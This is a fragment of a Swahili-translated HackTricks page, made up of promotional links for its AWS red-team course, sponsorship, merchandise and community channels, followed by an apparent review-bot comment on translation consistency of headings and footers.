<summary><strong>Jifunze kuhusu kudukua AWS kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)</strong></a><strong>!</strong></summary>
<summary>Support HackTricks</summary>
Njia nyingine za kusaidia HackTricks:
* Ikiwa unataka kuona **kampuni yako inatangazwa kwenye HackTricks** au **kupakua HackTricks kwa muundo wa PDF** Angalia [**MPANGO WA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
* Pata [**swag rasmi ya PEASS & HackTricks**](https://peass.creator-spring.com)
* Gundua [**Familia ya PEASS**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) ya kipekee
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Shiriki mbinu zako za kudukua kwa kuwasilisha PR kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
* Angalia [**mpango wa usajili**](https://github.com/sponsors/carlospolop)!
* **Jiunge na** 💬 [**kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **tufuatilie** kwenye **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Shiriki mbinu za hacking kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
</details>
{% endhint %}
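Review bot: `## References` replaces the Swahili "## Marejeo" while the footer directly below it is translated ("Jifunze na fanya mazoezi ya AWS Hacking", "Angalia [**mpango wa usajili**]"), so this file also ends up with an English heading and a Swahili footer under an English header block. Keep "## Marejeo" and align the two hint blocks of the file; "mbinu za hacking" here and "mbinu za udukuzi" in the rlogin file's footer should be unified as well.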